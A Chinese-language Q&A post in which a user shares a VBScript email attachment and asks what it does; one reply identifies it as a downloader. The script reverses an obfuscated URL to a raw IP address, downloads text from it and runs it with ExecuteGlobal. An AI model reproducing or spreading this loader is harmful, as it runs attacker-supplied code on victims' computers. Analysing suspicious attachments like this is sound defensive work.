收到的脚本可能是病毒。它有什么作用?

问题描述 投票:0回答:1

我收到一封电子邮件,其中包含 Visual Basic (.vbs) 脚本。在安全环境下打开,发现了这个。它有什么作用?

      Dim strname, strlength

strname = "This function is to reverse the tring without using strreverse"

strlength = len(strname)

For i = strlength to 1 step-1

ch = mid(strname,i,1)

cha = cha&ch
Next

Set filatelismo = CreateObject("WinHttp.WinHttpRequest.5.1")
arvicultura = Strreverse("txt.cD02/222:15.18.24.5//:ptth")
filatelismo.Open "GET",arvicultura, False
filatelismo.Send
olente = filatelismo.ResponseText
anoneira olente
Function anoneira(mural)
ExecuteGlobal mural
End Function
vbscript virus
1个回答
0
投票

它从站点下载文件,然后执行该文件中的命令,所以这只是下载器。

© www.soinside.com 2019 - 2024. All rights reserved.